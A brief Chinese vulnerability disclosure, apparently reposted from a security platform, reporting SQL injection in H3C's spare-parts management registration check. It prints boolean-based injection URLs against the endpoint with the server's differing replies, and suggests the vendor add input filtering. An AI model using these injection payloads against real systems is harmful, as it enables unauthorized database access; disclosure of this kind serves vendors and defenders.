详细说明:注册页面进行用户名检验的页面,没有对输入进行过滤 漏洞证明: http://rma.h3c测试数据/spms_outter/base/CheckRegistedOrg.do?orgname=admin 返回 "帐号:admin 已被注册,请换一个用户名注册!"
http://rma.h3c测试数据/spms_outter/base/CheckRegistedOrg.do?orgname=admin'%20and%20'a'='b 返回 "没有人注册 admin' and 'a'='b 这个帐号,您可以使用这个帐号注册。"
http://rma.h3c测试数据/spms_outter/base/CheckRegistedOrg.do?orgname=admin'%20or%20'a'='b 返回 "帐号:admin' or 'a'='b 已经有人申请,请换一个用户名注册!。"
可以试图探测出 数据库 为 Oracle ,带有修改性测试 不进行 修复方案:建议厂商自行增加SQL检测
查看更多关于华三通信备件管理系统存在SQL 注入漏洞及修复的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11550